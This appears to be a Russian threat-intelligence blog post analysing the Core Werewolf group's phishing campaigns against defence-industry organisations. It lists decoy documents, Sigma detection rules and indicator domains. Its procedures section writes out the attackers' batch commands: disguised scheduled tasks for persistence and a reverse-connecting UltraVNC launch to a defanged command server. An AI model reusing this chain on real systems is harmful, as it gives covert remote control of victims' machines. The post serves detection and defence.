Как стать автором
Обновить
66.42

Core Werewolf: легитимное ПО против ОПК и критической инфраструктуры

Уровень сложностиСредний
Время на прочтение9 мин
Количество просмотров4.6K

Как многие другие киберпреступники и группировки с государственным спонсированием, Core Werewolf использовала для своих задач легитимные средства. Проникнув в инфраструктуру с помощью фишинговых электронных писем, в дальнейшем преступники вместо вредоносного программного обеспечения применяли UltraVNC.

В этой статье мы проанализируем жизненный цикл обнаруженных атак Core Werewolf, рассмотрим тактики, техники и процедуры, использованные для компрометации целевых систем, а также опишем инфраструктуру группировки.

Атаки

Файл, относящийся к первой обнаруженной нами атаке, был загружен на VirusTotal 6 августа 2021 года. Примечательно, что вредоносные файлы в каждой атаке были замаскированы под документы Microsoft Word или PDF-файлы, хотя были исполняемыми и представляли собой самораспаковывающиеся архивы, например Прил.7_критерии_оценки...ГУВП.docx.exe. После открытия такого файла жертва действительно видела документ обещанного типа, при этом в фоновом режиме инсталлировалась UltraVNC, которая позволяла атакующим получить полный контроль над скомпрометированным устройством.

В первом обнаруженном файле в качестве такого документа использовался приказ одной из организаций ОПК (рис. 1).

Рис. 1. Фрагмент документа, использованного атакующими
Рис. 1. Фрагмент документа, использованного атакующими

Следующий обнаруженный файл был загружен 16 декабря 2021 года, и в качестве фишингового документа использовалось внутреннее распоряжение одного из крупнейших в России акционерных обществ (рис. 2).

Рис. 2. Фрагмент документа, использованного атакующими
Рис. 2. Фрагмент документа, использованного атакующими

Новая атака началась только после довольно значительного перерыва: файл был обнаружен 12 апреля 2022 года, а содержащийся в нем документ представлял собой резюме (рис. 3).

Рис. 3. Фрагмент документа, использованного атакующими
Рис. 3. Фрагмент документа, использованного атакующими

Далее последовала атака, файл из которой был загружен 18 апреля 2022 года и ориентирован на сотрудников организаций ОПК (рис. 4).

Рис. 4. Фрагмент документа, использованного атакующими
Рис. 4. Фрагмент документа, использованного атакующими

Следующий файл появился 27 апреля 2022 года и касался темы увольнения с военной службы (рис. 5).

Рис. 5. Фрагмент документа, использованного атакующими
Рис. 5. Фрагмент документа, использованного атакующими

В рамках новой атаки, файл из которой был загружен 8 мая 2022 года, атакующие снова использовали приказ одной из организаций ОПК (рис. 6).

Рис. 6. Фрагмент документа, использованного атакующими
Рис. 6. Фрагмент документа, использованного атакующими

12 мая 2022 года на VirusTotal был загружен новый файл, в этот раз в качестве документа использовали методические рекомендации одной из организаций ОПК (рис. 7).

Рис. 7. Фрагмент документа, использованного атакующими
Рис. 7. Фрагмент документа, использованного атакующими

Файл, загруженный 27 мая 2022 года, также содержал один из приказов (рис. 8).

Рис. 8. Фрагмент документа, использованного атакующими
Рис. 8. Фрагмент документа, использованного атакующими

Летние атаки начались с файла, загруженного 13 июня 2022 года. В качестве документа использовалось Постановление Правительства Российской Федерации «О внесении изменений в Положение о государственном регулировании цен на продукцию, поставляемую по государственному оборонному заказу» (рис. 9).

Рис. 9. Фрагмент документа, использованного атакующими
Рис. 9. Фрагмент документа, использованного атакующими

В следующей атаке, файл из которой был загружен 28 июня 2022 года, в качестве документа использовалось методическое пособие (рис. 10).

Рис. 10. Фрагмент документа, использованного атакующими
Рис. 10. Фрагмент документа, использованного атакующими

Июль начался с атаки, в которой использовался документ Управления ФСТЭК России по Северо-Западному федеральному округу «О мерах по повышению защищенности объектов информационной инфраструктуры Российской Федерации».

В файле, загруженном на VirusTotal 20 июля 2022 года, атакующие снова использовали один из распорядительных документов из области ОПК.

Файл, загруженный 27 июля 2022 года, снова содержал резюме, но уже другого человека (рис. 11). 

Рис. 11. Фрагмент документа, использованного атакующими
Рис. 11. Фрагмент документа, использованного атакующими

В августе атакующие снова использовали один из приказов (рис. 12).

Рис. 12. Фрагмент документа, использованного атакующими
Рис. 12. Фрагмент документа, использованного атакующими

В сентябре атакующие использовали не просто очередной приказ, а документ с грифом «Для служебного пользования».

В октябрьской атаке группа использовала Постановление Правительства Российской Федерации «О внесении изменений в государственную программу Российской Федерации „Развитие атомного энергопромышленного комплекса"» (рис. 13).

Рис. 13. Фрагмент документа, использованного атакующими
Рис. 13. Фрагмент документа, использованного атакующими

В первой ноябрьской атаке (файл загружен 2 ноября) в качестве документа применялась схема холодоснабжения высокопроизводительного вычислительного комплекса специального назначения.

На следующий день был загружен еще один файл — на этот раз использовался документ с набором схем.

В следующей ноябрьской атаке группа  использовала уже традиционный документ, связанный с работой ОПК (рис. 14).

Рис. 14. Фрагмент документа, использованного атакующими
Рис. 14. Фрагмент документа, использованного атакующими

Декабрьская атака вновь была сфокусирована на сотрудниках ОПК (рис. 15).

Рис. 15. Фрагмент документа, использованного атакующими
Рис. 15. Фрагмент документа, использованного атакующими

В первой атаке в 2023 году в качестве фишингового документа использовалась форма запроса (рис. 16). 

Рис. 16. Фрагмент документа, использованного атакующими
Рис. 16. Фрагмент документа, использованного атакующими

В следующей атаке в январе в качестве фишингового документа использовались Методические рекомендации по бронированию граждан Российской Федерации, пребывающих в запасе Вооруженных Сил Российской Федерации и работающих в организациях, на период мобилизации и на военное время (рис. 17).

Рис. 17. Фрагмент документа, использованного атакующими
Рис. 17. Фрагмент документа, использованного атакующими

В феврале 2023 года атакующие вернулись к использованию резюме в качестве фишинговых документов (рис. 18).

Рис. 18. Фрагмент документа, использованного атакующими
Рис. 18. Фрагмент документа, использованного атакующими

В марте 2023 года атакующие вновь воспользовались копией документа с грифом «Для служебного пользования».

20 марта 2023 года на VirusTotal был загружен еще один файл, фишинговый документ в составе которого также был ориентирован на сотрудников ОПК.

В апреле 2023 года атакующие в очередной раз воспользовались резюме в качестве фишингового документа (рис. 19).

Рис. 19. Фрагмент документа, использованного атакующими
Рис. 19. Фрагмент документа, использованного атакующими

В рамках майской атаки группировка вновь использовала один из приказов (рис. 20).

Рис. 20. Фрагмент документа, использованного атакующими
Рис. 20. Фрагмент документа, использованного атакующими

Процесс компрометации устройства в рамках каждой кампании практически не имеет значимых изменений, поэтому он описывается в следующем разделе, а не в контексте отдельно взятой атаки.

Тактики, техники и процедуры

Так как тактики, техники и процедуры атакующих совсем незначительно отличаются от одной атаки к другой, рассмотрим процесс компрометации устройства на примере файла из майской атаки.

После открытия распаковки и запуска файла с именем НУВП награждение полный.doc.exe осуществляются следующие действия:

  • Включается отложенное расширение переменных среды путем выполнения следующей команды:

setlocal enabledelayedexpansion
  • Устанавливаются следующие переменные среды (далее указанные переменные будут использоваться для обфускации запуска команд):

set sc46w96z76M16f76I86i96V16v56I76f56I06Z96V96q56O6=%COMPUTERNAME%
set ce18Z18w88q18r38o78t58x68i38P08J48m38I48y18s78S3=%RANDOM%
set Ue30z00l70K30B90i00V80E40J00K80D10w50M40t00Y30F3=nuvp
set MW17A27X27F57f77y07Q47R47j27J47g77d37a17Q77X07W8=doc
set BG15f35o55V85I95V75e65y55O85h75G55f75r45o35M55p4=Virtual
set Bo94Y44b04y64n44b34B24A04Y94e84x94h94z34q34e04b9=autore
set kM49J49K89y79Z49y39K09C99m69z29E79N49L89a39A39s6=connect
set mz70v70R90L60L20r00s90G00d80V40A20u20I90j80S00y4=443
set SF53S43Q83F33Z73M63X03N83i63i73x73F13r93p13S23v9=infovesty[.]ru
set ua60e50a30E10w90T60U60q10h70Z80C60d90x10P30Y10J3=exe
  • Создается задача в планировщике Windows для ежедневного завершения процесса с именем Virtual.exe:

schtasks /create /f /tn "OneDrive Purge Task-S-1-5-21-3177791385" /tr "taskkill /f /im Virtual.exe /sc daily /st 09:02
  • Выставляется режим ожидания 2 секунды:

timeout /t 2
  • Фишинговый документ копируется из открытого пользователем файла на диск:

copy /y "%CD%\go67x37i77J07R07W37O07G77J37T67z77l07H67z87w77M9.VH64z44L84J44O04O24a44d54X64C64q74c44R94y54y74R4" "%CD%\..\nuvp.doc"
  • Выставляется режим ожидания 4 секунды:

timeout /t 4
  • Открывается скопированный фишинговый документ start "" "%CD%..\nuvp.doc".

  • Исполняемый файл UltraVNC копируется из открытого пользователем файла на диск под именем Virtual.exe:

copy /y "su22Q42Y62S62R72m92H32I82n02z12w72T72M82T82a92q9.HH75f05T55A55m95l65z65l05u15d05y85o15n45E95i25L3" "Virtual.exe"
  • Создается задача в планировщике Windows для ежедневного запуска файла Virtual.exe:

schtasks /create /f /tn "OneDrive Init Task-I-2-5-22-8712003127" /tr "%HOMEDRIVE%%HOMEPATH%\AppData\Local\Temp\7ZipSfx.000\Virtual.exe" /sc daily /st 09:03
  • Завершается процесс Virtual.exe:

taskkill /f /im Virtual.exe
  • На диск копируется конфигурационный файл UltraVNC:

copy /y "UltraVNC.ini" "UltraVNC.ini"
  • Осуществляется запуск файла Virtual.exe:

start "" "Virtual.exe"
  • Создается задача в планировщике Windows для запуска UltraVNC с указанием командного сервера:

schtasks /create /f /tn "OneDrive Update Task-U-3-5-23-6820155392" /tr "%HOMEDRIVE%%HOMEPATH%\AppData\Local\Temp\7ZipSfx.000\Virtual.exe -autoreconnect -id:%COMPUTERNAME%_%RANDOM% -connect infovesty\[.\]ru:443" /sc daily /st 09:04
  • Осуществляется запуск UltraVNC:

start "" "%CD%\Virtual.exe" -autoreconnect -id:%COMPUTERNAME%_%RANDOM% -connect infovesty\[.\]ru:443

Таким образом атакующие не просто получают доступ к скомпрометированной системе после открытия жертвой вредоносного файла, но и обеспечивают себе персистентный доступ благодаря созданным в планировщике Windows задачам. Используемое атакующими легитимное программное обеспечение позволяет им получить полный контроль над скомпрометированным устройством, включая копирование и выгрузку файлов, а также отслеживание действий пользователя.

Инфраструктура

Атакующие стремились регистрировать доменные имена у нескольких регистраторов, а не у одного. Злоумышленники пользовались услугами как российских, так и зарубежных регистраторов, а именно:

  • «Регтайма»,

  • REG.RU,

  • Центра интернет-имен Украины,

  • Soaring Eagle Domains,

  • Realtime Register,

  • Wild West Domains,

  • OnlineNIC,

  • GoDaddy.

Для регистрации доменных имен атакующие использовали русские имена, например Aleksandr Vladimirovich Petrishev, а также электронные почты, зарегистрированные на популярных российских сервисах — mail.ru и yandex.ru. Кроме того, для регистрации доменных имен использовались в том числе мобильные телефоны, относящиеся к онлайн-сервисам, позволяющим получать СМС-сообщения (рис. 21). 

Рис. 21. Мобильный телефон, использованный злоумышленниками для регистрации некоторых доменных имен
Рис. 21. Мобильный телефон, использованный злоумышленниками для регистрации некоторых доменных имен

Стоит также отметить, что арендуемые атакующими серверы зачастую находились на территории России, что позволяло атакующим обойти черные списки и снизить вероятность своевременного обнаружения. 

Выводы

Безусловно, российско-украинский кризис внес значительные коррективы в мировой ландшафт угроз и вывел необходимость внедрения не только реактивного, но и проактивного подхода к обнаружению угроз на новый уровень. Злоумышленники находят все новые методы, чтобы обойти средства защиты, и все чаще отказываются от использования вредоносного программного обеспечения в пользу легитимных или встроенных в операционную систему инструментов, эффективность которых в очередной раз доказывают преступные группы, вовлеченные в человекоуправляемые атаки.

Возможности обнаружения

Несмотря на использование атакующими легитимного программного обеспечения, процесс компрометации целевого устройства предоставляет защитникам ряд возможностей обнаружения вредоносной активности, позволяющих нивелировать атаку на начальных этапах.

Атакующие очень активно используют планировщик задач Windows в том числе для ежедневного завершения процесса UltraVNC с использованием taskkill. При этом родительским процессом для создания задачи будет выступать cmd.exe. Такая совокупность действий не является типичной, поэтому мы можем использовать эту информацию для обнаружения:

title: Taskkill Abuse via Task Scheduler
id: c0b32533-ba84-4ce9-9be6-d5e5d024bf03
status: experimental
description: Detects taskkill abuse via Task Scheduler as seen in Core Werewolf campaigns
references: https://bi.zone/expertise/blog/core-werewolf-protiv-opk-i-kriticheskoy-infrastruktury/
author: BI.ZONE
date: 2023/05/30
tags:
    - attack.execution
    - attack.t1053.005
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\cmd.exe'
        Image|endswith: '\schtasks.exe'
        CommandLine|Contains|All:
            - 'taskkill'
            - ' /f'
            - ' /im '
    condition: selection
fields:
    - ParentImage
    - Image
    - CommandLine
level: medium

Планировщик заданий также используется атакующими для ежедневного запуска UltraVNC. При этом для запуска средства удаленного доступа используются специфические аргументы. Эта информация также может использоваться для обнаружения:

title: Scheduled Task for Malicious UltraVNC
id: dd963a36-cb22-4925-8a94-fc9a9abfb65d
status: experimental
description: Detects scheduled task creation for UltraVNC as seen in Core Werewolf campaigns
references: https://bi.zone/expertise/blog/core-werewolf-protiv-opk-i-kriticheskoy-infrastruktury/
author: BI.ZONE
date: 2023/05/30
tags:
    - attack.execution
    - attack.t1053.005
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\cmd.exe'
        Image|endswith: '\schtasks.exe'
        CommandLine|Contains|All:
            - 'autoreconnect '
            - 'connect '
            - 'id'
    condition: selection
fields:
    - ParentImage
    - Image
    - CommandLine
level: medium

Индикаторы компрометации

  • clodmail.ru

  • seemsurprise.com

  • moscowguarante.com

  • linux-tech-world.net

  • linux-techworld.com

  • linux-tech-world.com

  • getvalerianllc.com

  • bitsbfree.com

  • licensecheckout.net

  • win32soft.com

  • microsoftsupertech.com

  • microsofttechinfo.com

  • microsoftsupertech.com

  • autotimesvc.com

  • msk-gov.com

  • samssmgr.com

  • versusmain.com

  • savebrowsing.net

  • statusgeotrust.com

  • contileservices.net

  • tapiservicemgr.com

  • microsoftdownloaderonline.com

  • microsoftdownloadonline.com

  • microsoftdownloader.com

  • cortanaupdater.net

  • cortanaupdater.com

  • checkerserviceonline.net

  • checkerserviceonline.com

  • softsandtools.com

  • sensauto.info

  • softdownloaderonline.net

  • softdownloaderonline.com

  • uploadingonline.com

  • uploadeonline.com

  • uploaderonline.com

  • webupdateronline.net

  • webupdateronline.com

  • winuptodate.com

  • winupdateonline.com

  • winupdateronline.com

  • webengincs.com

  • exactsynchtime.ru

  • licensecheckout.com

  • servicehost-update.net

  • passportyandex.net

Дополнительные индикаторы компрометации доступны клиентам BI.ZONE ThreatVision.

Как защитить компанию от таких угроз

Применением легитимных инструментов для атак на компании сегодня пользуются все чаще. Превентивные средства защиты не детектируют подобные попытки — злоумышленники проникают в инфраструктуру незамеченными. Для выявления подобных обращений мы рекомендуем внедрять в компании практику выявления, реагирования и предупреждения киберугроз в составе центра мониторинга кибербезопасности, например BI.ZONE TDR.

Теги:
Хабы:
Всего голосов 6: ↑3 и ↓3+3
Комментарии5

Публикации

Информация

Сайт
bi.zone
Дата регистрации
Численность
501–1 000 человек
Местоположение
Россия

Истории